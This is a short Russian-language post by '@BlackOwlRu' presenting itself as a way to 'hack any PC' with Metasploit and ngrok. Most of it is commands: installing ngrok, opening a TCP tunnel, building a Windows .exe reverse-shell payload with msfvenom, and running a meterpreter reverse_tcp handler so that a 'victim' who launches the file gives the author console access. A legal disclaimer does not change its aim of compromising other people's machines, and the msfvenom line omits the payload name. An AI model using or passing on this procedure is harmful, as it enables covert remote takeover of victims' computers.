November 14, 2023

Взлом любого ПК с помощью Metasploit + Ngrok

Дисклеймер: Автор не несет ответсвенности за действия совершенные
читателями этого поста. Создание, использование и распространение вредоносных компьютерных программ запрещено статьей - 273 УК РФ

Что нам понадобится?

  1. Kali Linux
  2. Ngrok

Kali Linux:

Открываем Терминал

Скачиваем Ngrok по команде

 curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list && sudo apt update && sudo apt install ngrok

Заходим на ngrok.com/download и регаем аккаунт

Листаем вниз и находим строку с командой

ngrok config add-authtoken <token>

вместо <token>, там будет ваш токен, копируем команду с сайта и вставляем в терминал

Запускаем локальный сервер командой

ngrok tcp 9999
У вас должно вывести это

После открываем новое окно в консоли вводим

msfvenom -p LHOST=2.tcp.ngrok.io LPORT=12223 -f exe > название файла.exe

В строке LHOST и LPORT вводите то что вывел вам NGROK

После этого в папке где вы находились во время ввода команды, появится файл с вашим названием .exe, его должна запустить жертва

Открываем еще одно новое окно и пишем туда

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 9999
exploit

теперь когда жертва запустит файл у вас появиться доступ к его Консоли

Написал: @BlackOwlRu